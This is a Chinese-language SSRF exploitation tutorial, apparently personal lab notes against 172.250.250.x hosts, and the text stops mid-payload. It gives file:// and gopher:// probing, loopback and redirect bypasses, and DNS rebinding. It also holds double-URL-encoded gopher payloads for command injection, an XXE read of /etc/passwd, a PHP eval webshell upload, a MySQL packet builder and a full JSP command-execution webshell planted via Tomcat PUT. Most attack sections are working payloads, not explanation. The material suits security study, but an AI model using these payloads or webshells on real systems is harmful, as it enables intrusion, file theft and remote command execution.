SSRF

达达2025-07-172025-08-03

0x001SSRF前置课程NAT

SSRF

服务器伪造是一种由攻击者形成服务器端发起的安全漏洞

NAT

网络地址转换通过将一个外部IP地址和端口映射到更大的内部IP地址集来转换IP地址

0x002SSRF漏洞原理

攻击的目标：

从外网无法访问的内部系统

形成的原因：

大部分是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤与限制

从指定URL地址获取网页文本内容

加载指定地址的图片，下载

百度识图，给出一串URL就能识别出图片

SSRF漏洞利用：通过服务器A(SSRF服务器)访问A所在内网的其他服务器获取信息，进而利用SSRF实现其他漏洞利用。

利用file协议读取本地文件

对服务器所在内网，本地进行端口扫描，获取一些服务的banner信息

攻击运行在内网或本地的应用程序

对内网web应用进行指纹识别，识别企业内部的资产信息

攻击内外网的web应用，主要是使用HTTP GET请求就可以实现的攻击

0x003SSRF信息收集file伪协议

伪协议

file://  从文件系统中读取文件内容，如file:///etc/passwd

dict://  字典服务协议，访问字典资源，如dict:///ip:6739/info:

ftp://  可用于网络端口扫描

sftp://  SSH文件传输协议或安全文件传输协议

ldap://  轻量级目录访问协议

tftp://  简单文件传输协议

gopher://  分布式文档传递服务

file:// 从文件系统中读取文件内容，如file:///[文件路径]

file:///etc/passwd 读取文件passwd

file:///etc/hosts 显示当前操作系统网卡的IP

file:///proc/net/arp 显示arp缓存表(寻找内网其他主机)

file:///proc/net/fib_trie 显示当前网段路由信息

为什么只有三个因为arp只有通信了才会有arp表

然后c类地址的掩码是24 即ip地址是从1到254

我们可以访问http://172.250.250.1->.254

比如下面访问了 .6 arp表里就有了 .6

00:00:00…… 的就是不存在的

0x004SSRF信息收集Dict伪协议

0x003是查找内网存活主机这里就是查找内网主机开放端口

1 2	ftp:// 效率想对较低 dict:// 字典服务协议，访问字典资源，如dict:///ip:6739/info:

0x005 SSRF信息收集Http伪协议

这个其实也就是目录扫描了

0x006SSRF利用Gopher伪协议学习

gopher伪协议

利用范围较广：

1	[GET提交][POST提交][redis][Fastcgi][sql]

1.为何利用gopher伪协议

2.利用gopher伪协议发起get/post提交

基本格式:

1	URL:gopher://<host>:<port>/<gopher-path>

web也需要加端口号80

gopher协议默认端口为70

1
2
3

gopher://172.250.250.4:80/_加头部信息
注意这个数据最后面是有一个回车的   即编码后的%0d%0a
用bp提交   需要对_后面的数据进行两次url编码

POST提交加上

1 2	Content-Type: Content-Length:

POST /name.php?name=benben HTTP/1.1
Host: 172.250.250.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

name=benben2222

0x007SSRF之环回地址绕过

本地回环地址：

IPv4 地址范围：

127.0.0.0 到 127.255.255.255
- 这个范围内的所有地址都是本地回环地址，指向本机的网络接口，数据包不会发送到网络中。
- 常见的回环地址包括：
  - 127.0.0.1 (最常用的回环地址)
  - 127.0.0.2, 127.0.0.3, …, 127.255.255.255
这些地址通常被用来进行本地的网络通信。例如，127.0.0.1 是默认的本地回环地址，通常用于指代计算机自身。
127.1:
- 127.1 是 127.0.0.1 的一种简写形式，它是 本地回环地址（localhost）的一个有效变体。
- 具体来说，127.1 是属于 127.0.0.0/8 网络段中的一个地址，代表的是本机的回环接口。
- 127.0.0.0/8 网络段的所有地址（包括 127.0.0.1, 127.1, 127.255.255.255 等）都指向本机。
0:
- 0 作为主机名是一个特殊情况，它是 0.0.0.0 的简写。
- 0.0.0.0 不是标准的本地回环地址，通常表示 “所有接口”，即与所有网络接口相关的地址。
- 在一些情况下，0.0.0.0 可能会指向本机的网络接口，但它通常用于路由、绑定监听接口时使用，不常用作回环地址。

但如果在某些环境下，0 被解析为 0.0.0.0，也可能指向本地机器，尤其是在没有明确的域名解析配置时。因此，http://0/flag.php 也可能成功访问本地资源。

017700000001

0x008SSRF之302重定向绕过

这里要在自己公网服务器上构建一个302重定向

safe.taobao.com

spoofed.burpcollaborator.net

sudo.cc

也可以跳转到127.0.0.1

1
2
3

<?php
header('Location: http://127.0.0.1/flag.php');
?>

通过php -S 0.0.0.0:7777去开启监听首先你要确定你的7777端口是在开放状态下的

像我的php文件在 ~ 目录下直接访问 http://公网ip 就可以了

0x009 SSRF之DNS重绑定绕过

针对SSRF漏洞的防御

1.解析目标URL,获取其Host

2.解析Host，获取Host指向的IP地址

3.检查IP地址是否为内网地址

4.请求URL

5.如果有跳转，拿出跳转URL，执行1

可以有效限制：直接访问内网IP；302跳转；

xip.io/xip.name及短链接变换等URL变形；畸形URL；iframe攻击；IP进制转换

针对这种防御可以使用DNS Rebinding Attack(DNS重绑定攻击)

https://lock.cmpxchg8b.com/rebinder.html

让A为你服务器的公网地址 B为私网ip 127.0.0.1 我试了B为公网一次没成功

然后拿着给你的网址去访问 http://网址/flag.php 就可以了没成功就多试几次

0x010使用SSRF进行命令执行

0x011使用SSRF进行POST提交命令执行

http://172.250.250.5

POST / HTTP/1.1
Host: 172.250.250.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

ip=127.0.0.1;ls

用bp发包上面内容进行两次url编码

url=gopher%3A%2F%2F172.250.250.5%3A80%2F_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%35%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%31%25%33%35%25%30%64%25%30%61%25%30%64%25%30%61%25%36%39%25%37%30%25%33%64%25%33%31%25%33%32%25%33%37%25%32%65%25%33%30%25%32%65%25%33%30%25%32%65%25%33%31%25%33%62%25%36%63%25%37%33

0x012使用SSRF进行XXE漏洞利用

这里是一个登录页面的例题显示

http://172.250.250.6

这里是一个通过gopher伪协议成功提交想要的post数据利用xxe漏洞的过程

先抓包提交页面请求头信息构造gopher要提交的post数据

这里注意类型是 application/xml

1	<user><username>admin</username><password>admin</password></user>

这个是xxe的提交方式相当于 username=admin password=admin

这个是xxe漏洞利用的方式

POST /doLogin.php HTTP/1.1
Host: 172.250.250.6
Content-Type: application/xml;charset=utf-8
Content-Length: 65

<user><username>admin</username><password>admin</password></user>

url=gopher%3A%2F%2F172.250.250.6%3A80%2F_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%36%34%25%36%66%25%34%63%25%36%66%25%36%37%25%36%39%25%36%65%25%32%65%25%37%30%25%36%38%25%37%30%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%36%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%64%25%36%63%25%33%62%25%36%33%25%36%38%25%36%31%25%37%32%25%37%33%25%36%35%25%37%34%25%33%64%25%37%35%25%37%34%25%36%36%25%32%64%25%33%38%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%36%25%33%35%25%30%64%25%30%61%25%30%64%25%30%61%25%33%63%25%37%35%25%37%33%25%36%35%25%37%32%25%33%65%25%33%63%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%33%65%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%33%63%25%32%66%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%33%65%25%33%63%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%33%65%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%33%63%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%33%65%25%33%63%25%32%66%25%37%35%25%37%33%25%36%35%25%37%32%25%33%65

POST /doLogin.php HTTP/1.1
Host: 172.250.250.6
Content-Type: application/xml;charset=utf-8
Content-Length: 130

<!DOCTYPE root [<!ENTITY benben SYSTEM "file:///etc/passwd">]><user><username>&benben;</username><password>admin</password></user>

url=gopher%3A%2F%2F172.250.250.6%3A80%2F_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%36%34%25%36%66%25%34%63%25%36%66%25%36%37%25%36%39%25%36%65%25%32%65%25%37%30%25%36%38%25%37%30%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%36%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%36%64%25%36%63%25%33%62%25%36%33%25%36%38%25%36%31%25%37%32%25%37%33%25%36%35%25%37%34%25%33%64%25%37%35%25%37%34%25%36%36%25%32%64%25%33%38%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%31%25%33%33%25%33%30%25%30%64%25%30%61%25%30%64%25%30%61%25%33%63%25%32%31%25%34%34%25%34%66%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%30%25%35%62%25%33%63%25%32%31%25%34%35%25%34%65%25%35%34%25%34%39%25%35%34%25%35%39%25%32%30%25%36%32%25%36%35%25%36%65%25%36%32%25%36%35%25%36%65%25%32%30%25%35%33%25%35%39%25%35%33%25%35%34%25%34%35%25%34%64%25%32%30%25%32%32%25%36%36%25%36%39%25%36%63%25%36%35%25%33%61%25%32%66%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34%25%32%32%25%33%65%25%35%64%25%33%65%25%33%63%25%37%35%25%37%33%25%36%35%25%37%32%25%33%65%25%33%63%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%33%65%25%32%36%25%36%32%25%36%35%25%36%65%25%36%32%25%36%35%25%36%65%25%33%62%25%33%63%25%32%66%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%33%65%25%33%63%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%33%65%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65%25%33%63%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%66%25%37%32%25%36%34%25%33%65%25%33%63%25%32%66%25%37%35%25%37%33%25%36%35%25%37%32%25%33%65

打好payload用gopher协议提交即可

0x013使用SSRF进行SQL漏洞利用

在使用SSRF进行SQL注入漏洞利用时平常的注释符 –+ +其实就是空格但是在这里就不能用 + 号表示空格了空格就用%20表示

如果要在hackerbar里写的话就要写空格的二次URL编码了 %25%20

0x014利用SSRF进行文件上传漏洞利用

multipart/form-data的定义

媒体类型multipart/form-data遵循multipart MIME数据流定义（该定义可以参考Section 5.1 - RFC2046）,大概含义就是：媒体类型multipart/form-data的数据体由多个部分组成，这些部分由一个固定边界值(Boundary)分隔

#请求头 --必须加，指定Content-Type: multipart/form-data,指定唯一边界值
Content-Type: multipart/form-data; boundary=${Boundary}

--${Boundary}
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: images/jpeg

<?php @eval($_POST[1]);?>
--${Boundary}
Content-Disposition: form-data; name="submit"    #这里是submit
Content-Type: text/plain;charset=UTF-8

text encoded in UTF-8
--${Boundary}--

POST /Pass-01/index.php HTTP/1.1
Host: 172.250.250.14
Content-Type: multipart/form-data; boundary=--aaaa
Content-Length: 265

----aaaa
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: images/jpeg

<?php phpinfo();?>
----aaaa
Content-Disposition: form-data; name="submit"
Content-Type: text/plain;charset=UTF-8

上传
----aaaa--

url=gopher%3A%2F%2F172.250.250.14%3A80%2F_%25%35%30%25%34%66%25%35%33%25%35%34%25%32%30%25%32%66%25%35%30%25%36%31%25%37%33%25%37%33%25%32%64%25%33%30%25%33%31%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38%25%32%65%25%37%30%25%36%38%25%37%30%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%31%25%33%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%64%25%37%35%25%36%63%25%37%34%25%36%39%25%37%30%25%36%31%25%37%32%25%37%34%25%32%66%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%36%34%25%36%31%25%37%34%25%36%31%25%33%62%25%32%30%25%36%32%25%36%66%25%37%35%25%36%65%25%36%34%25%36%31%25%37%32%25%37%39%25%33%64%25%32%64%25%32%64%25%36%31%25%36%31%25%36%31%25%36%31%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%32%25%33%36%25%33%35%25%30%64%25%30%61%25%30%64%25%30%61%25%32%64%25%32%64%25%32%64%25%32%64%25%36%31%25%36%31%25%36%31%25%36%31%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%34%25%36%39%25%37%33%25%37%30%25%36%66%25%37%33%25%36%39%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%36%34%25%36%31%25%37%34%25%36%31%25%33%62%25%32%30%25%36%65%25%36%31%25%36%64%25%36%35%25%33%64%25%32%32%25%37%35%25%37%30%25%36%63%25%36%66%25%36%31%25%36%34%25%35%66%25%36%36%25%36%39%25%36%63%25%36%35%25%32%32%25%33%62%25%32%30%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%33%64%25%32%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%32%32%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%37%33%25%32%66%25%36%61%25%37%30%25%36%35%25%36%37%25%30%64%25%30%61%25%30%64%25%30%61%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%37%30%25%36%38%25%37%30%25%36%39%25%36%65%25%36%36%25%36%66%25%32%38%25%32%39%25%33%62%25%33%66%25%33%65%25%30%64%25%30%61%25%32%64%25%32%64%25%32%64%25%32%64%25%36%31%25%36%31%25%36%31%25%36%31%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%34%25%36%39%25%37%33%25%37%30%25%36%66%25%37%33%25%36%39%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%36%34%25%36%31%25%37%34%25%36%31%25%33%62%25%32%30%25%36%65%25%36%31%25%36%64%25%36%35%25%33%64%25%32%32%25%37%33%25%37%35%25%36%32%25%36%64%25%36%39%25%37%34%25%32%32%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%37%34%25%36%35%25%37%38%25%37%34%25%32%66%25%37%30%25%36%63%25%36%31%25%36%39%25%36%65%25%33%62%25%36%33%25%36%38%25%36%31%25%37%32%25%37%33%25%36%35%25%37%34%25%33%64%25%35%35%25%35%34%25%34%36%25%32%64%25%33%38%25%30%64%25%30%61%25%30%64%25%30%61%25%30%61%25%32%30%25%30%64%25%30%61%25%32%64%25%32%64%25%32%64%25%32%64%25%36%31%25%36%31%25%36%31%25%36%31%25%32%64%25%32%64

然后通过gopher协议进行提交后面http协议直接访问

0x015利用SSRF进行文件包含漏洞利用

这里就利用SSRF通过http协议进行文件包含漏洞的利用

0x016使用SSRF对mysql进行未授权查询

tcpdump -i lo port 3306 -w mysql.pcapng

抓包数据流

追踪TCP流

import sys

def results(s):
    a=[s[i:i+2] for i in range(0,len(s),2)]
    return "gopher://172.250.250.1:3306_%"+"%".join(a)

if __name__ =="__main__":
    s=sys.argv[1]
    print(results(s))

gopher://172.250.250.1:3306_%a4%00%00%01%85%a2%bf%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%67%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%06%38%34%31%32%35%31%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%34%33%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%0f%00%00%00%03%73%68%6f%77%20%64%61%74%61%62%61%73%65%73%01%00%00%00%01

没成功QAQ；

工具网址https://github.com/tarunkant/Gopherus

这个要用python2.7 运行

1	python2.7 gopherus.py --exploit mysql

别人是本地IP 这里记得把ip地址改了

0x017使用SSRF对mysql未授权文件写入

1	show variables like "%secure%";

看最后三个参数最后一个参数还没有值证明我们可以写入文件

0x018使用SSRF对tomcat文件写入

1	http://172.250.250.7:8080

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT6.1; Win64; x64;Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532
*************************shell***************************

<%
  String command = request.getParameter("cmd");
  if(command != null) {
      try {
          java.io.InputStream in = Runtime.getRuntime().exec(command).getInputStream();
          int a = -1;
          byte[] b = new byte[2048];
          out.print("<pre>");
          while((a = in.read(b)) != -1) {
              out.println(new String(b, 0, a));
          }
          out.print("</pre>");
          in.close();
      } catch (Exception e) {
          out.print("Error executing command: " + e.getMessage());
      }
  } else {
      out.print("format: xxx.jsp?cmd=Command");
  }
%>

gopher提交

gopher%3A%2F%2Fip%3A8080%2F_PUT /9.jsp/ HTTP/1.1
Host: 172.250.250.7:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT6.1; Win64; x64;Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 608

<%
  String command = request.getParameter("cmd");
  if(command != null) {
      try {
          java.io.InputStream in = Runtime.getRuntime().exec(command).getInputStream();
          int a = -1;
          byte[] b = new byte[2048];
          out.print("<pre>");
          while((a = in.read(b)) != -1) {
              out.println(new String(b, 0, a));
          }
          out.print("</pre>");
          in.close();
      } catch (Exception e) {
          out.print("Error executing command: " + e.getMessage());
      }
  } else {
      out.print("format: xxx.jsp?cmd=Command");
  }
%>

url=gopher%3A%2F%2F172.250.250.7%3A8080%2F_%25%35%30%25%35%35%25%35%34%25%32%30%25%32%66%25%33%39%25%32%65%25%36%61%25%37%33%25%37%30%25%32%66%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%32%25%33%35%25%33%30%25%32%65%25%33%37%25%33%61%25%33%38%25%33%30%25%33%38%25%33%30%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%33%61%25%32%30%25%32%61%25%32%66%25%32%61%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%32%64%25%34%63%25%36%31%25%36%65%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%61%25%32%30%25%36%35%25%36%65%25%30%64%25%30%61%25%35%35%25%37%33%25%36%35%25%37%32%25%32%64%25%34%31%25%36%37%25%36%35%25%36%65%25%37%34%25%33%61%25%32%30%25%34%64%25%36%66%25%37%61%25%36%39%25%36%63%25%36%63%25%36%31%25%32%66%25%33%35%25%32%65%25%33%30%25%32%30%25%32%38%25%36%33%25%36%66%25%36%64%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%63%25%36%35%25%33%62%25%32%30%25%34%64%25%35%33%25%34%39%25%34%35%25%32%30%25%33%39%25%32%65%25%33%30%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%36%34%25%36%66%25%37%37%25%37%33%25%32%30%25%34%65%25%35%34%25%33%36%25%32%65%25%33%31%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%33%36%25%33%34%25%33%62%25%32%30%25%37%38%25%33%36%25%33%34%25%33%62%25%35%34%25%37%32%25%36%39%25%36%34%25%36%35%25%36%65%25%37%34%25%32%66%25%33%35%25%32%65%25%33%30%25%32%39%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%33%25%36%63%25%36%66%25%37%33%25%36%35%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%36%25%33%30%25%33%38%25%30%64%25%30%61%25%30%64%25%30%61%25%33%63%25%32%35%25%30%64%25%30%61%25%32%30%25%32%30%25%35%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%30%25%36%33%25%36%66%25%36%64%25%36%64%25%36%31%25%36%65%25%36%34%25%32%30%25%33%64%25%32%30%25%37%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%32%65%25%36%37%25%36%35%25%37%34%25%35%30%25%36%31%25%37%32%25%36%31%25%36%64%25%36%35%25%37%34%25%36%35%25%37%32%25%32%38%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%36%39%25%36%36%25%32%38%25%36%33%25%36%66%25%36%64%25%36%64%25%36%31%25%36%65%25%36%34%25%32%30%25%32%31%25%33%64%25%32%30%25%36%65%25%37%35%25%36%63%25%36%63%25%32%39%25%32%30%25%37%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%34%25%37%32%25%37%39%25%32%30%25%37%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%61%25%36%31%25%37%36%25%36%31%25%32%65%25%36%39%25%36%66%25%32%65%25%34%39%25%36%65%25%37%30%25%37%35%25%37%34%25%35%33%25%37%34%25%37%32%25%36%35%25%36%31%25%36%64%25%32%30%25%36%39%25%36%65%25%32%30%25%33%64%25%32%30%25%35%32%25%37%35%25%36%65%25%37%34%25%36%39%25%36%64%25%36%35%25%32%65%25%36%37%25%36%35%25%37%34%25%35%32%25%37%35%25%36%65%25%37%34%25%36%39%25%36%64%25%36%35%25%32%38%25%32%39%25%32%65%25%36%35%25%37%38%25%36%35%25%36%33%25%32%38%25%36%33%25%36%66%25%36%64%25%36%64%25%36%31%25%36%65%25%36%34%25%32%39%25%32%65%25%36%37%25%36%35%25%37%34%25%34%39%25%36%65%25%37%30%25%37%35%25%37%34%25%35%33%25%37%34%25%37%32%25%36%35%25%36%31%25%36%64%25%32%38%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%39%25%36%65%25%37%34%25%32%30%25%36%31%25%32%30%25%33%64%25%32%30%25%32%64%25%33%31%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%32%25%37%39%25%37%34%25%36%35%25%35%62%25%35%64%25%32%30%25%36%32%25%32%30%25%33%64%25%32%30%25%36%65%25%36%35%25%37%37%25%32%30%25%36%32%25%37%39%25%37%34%25%36%35%25%35%62%25%33%32%25%33%30%25%33%34%25%33%38%25%35%64%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%32%38%25%32%32%25%33%63%25%37%30%25%37%32%25%36%35%25%33%65%25%32%32%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%37%25%36%38%25%36%39%25%36%63%25%36%35%25%32%38%25%32%38%25%36%31%25%32%30%25%33%64%25%32%30%25%36%39%25%36%65%25%32%65%25%37%32%25%36%35%25%36%31%25%36%34%25%32%38%25%36%32%25%32%39%25%32%39%25%32%30%25%32%31%25%33%64%25%32%30%25%32%64%25%33%31%25%32%39%25%32%30%25%37%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%36%63%25%36%65%25%32%38%25%36%65%25%36%35%25%37%37%25%32%30%25%35%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%38%25%36%32%25%32%63%25%32%30%25%33%30%25%32%63%25%32%30%25%36%31%25%32%39%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%64%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%32%38%25%32%32%25%33%63%25%32%66%25%37%30%25%37%32%25%36%35%25%33%65%25%32%32%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%